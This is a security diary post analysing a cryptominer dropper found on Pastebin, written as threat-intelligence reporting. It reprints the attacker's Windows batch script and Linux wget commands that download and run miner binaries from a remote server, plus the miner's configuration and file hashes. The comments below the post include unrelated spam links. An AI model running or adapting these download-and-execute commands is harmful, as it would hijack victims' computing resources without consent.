Mining or Nothing!
Cryptocurrencies mining has been a trending attack for a few weeks. Our idling CPUs are now targeted by bad guys who are looked to generate some extra revenue by abusing our resources. Other fellow handlers already posted diaries about this topic. Renato found a campaign based on a WebLogic exploit[1] and Jim detected a peak of activity on port port 3333[2]. Yesterday, while reviewed alerts generated by my hunting scripts, I found an interesting snippet of code on Pastebin. Here is a copy of the script with some added comments in blue:
@shift /0 @echo off // No idea why a new service is created, there is no reference to this executable? sc create MicrsoftFTP binPath= C:\ProgramData\svchost.exe start= auto // Let’s grab the miner // Not very efficient because admin privileges are required to dump the file in this directory powershell.exe -WindowStyle Hidden $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http://x.x.x.x:2114/drivers.exe', 'C:\Windows\drivers.exe') ping 1.1.1.1 -n 10>nul 2>nul set _task=drivers.exe // Miner configuration set _svr=C:\Windows\drivers.exe -o bom.dnstop[.]info:4555 -u 4BHZCKCaArVd84u …(removed)... bydit7sHgu4BAo5Rh -p x -k -B set _des=start.bat :checkstart SET status=1 // Test if the miner is running (TASKLIST|FIND /I "%_task%"||SET status=0) 2>nul 1>nul ECHO %status% // If not running, (re)start it or sleep IF %status% EQU 1 (goto checkag ) ELSE (goto startsvr) // Create the start.bat script and launch the miner :startsvr echo %time% // Original strings were in Chinese // Translation: "******** Program started ********" echo ********??????******** // Translation: "The program restarts at% time%, check the system log" echo ??????? %time% ,??????? >> restart_service.txt echo start %_svr% > %_des% echo exit >> %_des% start %_des% set/p=.<nul for /L %%i in (1 1 10) do set /p a=.<nul&ping.exe /n 2 127.0.0.1>nul echo . echo Wscript.Sleep WScript.Arguments(0) >%tmp%\delay.vbs cscript //b //nologo %tmp%\delay.vbs 10000 del %_des% /Q // Translation: "******** Program completed ********" echo ********??????******** goto checkstart // Simple sleep function based on a VBS one-liner script :checkag // Translation: "% time% The program is running normally, and it will be checked after 10 seconds." echo %time% ??????,10??????.. echo Wscript.Sleep WScript.Arguments(0) >%tmp%\delay.vbs cscript //b //nologo %tmp%\delay.vbs 10000 goto checkstart :begin REM
The file referenced in the script (‘drivers.exe’) is not available anymore (HTTP 404 returned) but the server is running an HttpFileServer[3] instance which is very popular in China (I found plenty of them on Chinese servers).
You can see multiple files and installation script to deploy mining tools in Windows but also Linux boxes. Example:
cd /tmp wget -O xmrigDaemon http://x.x.x.x:2114/xmrigDaemon && chmod +x xmrigDaemon wget -O xmrigMiner http://x.x.x.x:2114/xmrigMiner && chmod +x xmrigMiner wget -O config.json http://x.x.x.x:2114/config.json && chmod +x config.json chmod +x xmrigDaemon chmod +x xmrigMiner chmod +x config.json ./xmrigDaemon &
Even more interesting, the configuration is publicly available (config.json) and contains a lot of details about the attacker:
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"doublehash-thread-mask" : null, // for av=2/4 only, limits doublehash to given threads (mask), mask "0x3" means run doublehash on thread 0 and 1 only (default: all threads)
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 100, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"syslog": false, // use system log for output messages
"threads": null, // number of miner threads
"pools": [
{
"url": “bom.dnstop[.]info:2222", // URL of mining server
"user": “4BHZCKCaArVd84uydsakdzVHRtBJqG …(removed)… 3bBJJESH28YHbydit7sHgu4BAo5Rh", // username for mining server
"pass": “Lall …(removed)… ", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
},
"cc-client": {
"url": "bom.dnstop.info:3324", // url of the CC Server (ip:port)
"access-token": "mySecret", // access token for CC Server (has to be the same in config_cc.json)
"worker-id": null, // custom worker-id for CC Server (otherwise hostname is used)
"update-interval-s": 10 // status update interval in seconds (default: 10 min: 1)
}
}
Here is a table with files details:
| Name | MD5 | Type | VT Score |
|---|---|---|---|
| discuz | 588dcdd23deb25d99b0924ef96e4681f | ELF 32bits | Unknown |
| discuz.exe | 08855aa283b692347bcabb48d6f8bcdf | PE32 | 52/68 |
| lpost.exe | 6a33d25fa28fd865a5e2fa43250e64dd | PE32 | 51/68 |
| master.exe | b5cc55f84c0d4f4b86f76956f94b170d | PE32 | 42/68 |
| ss1s.exe | bb2d8d8c8087073d83a7226c4a44296b | PE32 | 15/67 |
| svchost.exe | 6a33d25fa28fd865a5e2fa43250e64dd | PE32 | 51/68 |
| xmrigDaemon | 7dc04d39f2786eceab4fbf2cf16eded6 | ELF 32bits | Unknown |
| xmrigDaemon-2 | 710f2be21798478cc2f534ee2eb7b800 | ELF 64bits | 1/60 |
| xmrigMiner | b87982f5f938b2a7c9852a5de63bbc68 | ELF 32bits | Unknown |
| xmrigMiner-2 | f8cb16918b42505abe547da37b9614a9 | ELF 64bits | 14/60 |
[1] https://isc.sans.edu/forums/diary/Campaign+is+using+a+recently+released+WebLogic+exploit+to+deploy+a+Monero+miner/23191/
[2] https://isc.sans.edu/forums/diary/What+is+going+on+with+port+3333/23215/
[3] http://rejetto.com/hfs/
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
Comments
www
Nov 17th 2022
6 months ago
EEW
Nov 17th 2022
6 months ago
qwq
Nov 17th 2022
6 months ago
mashood
Nov 17th 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
5 months ago
isc.sans.edu
Dec 3rd 2022
5 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
isc.sans.edu
Dec 26th 2022
5 months ago
isc.sans.edu
Dec 26th 2022
5 months ago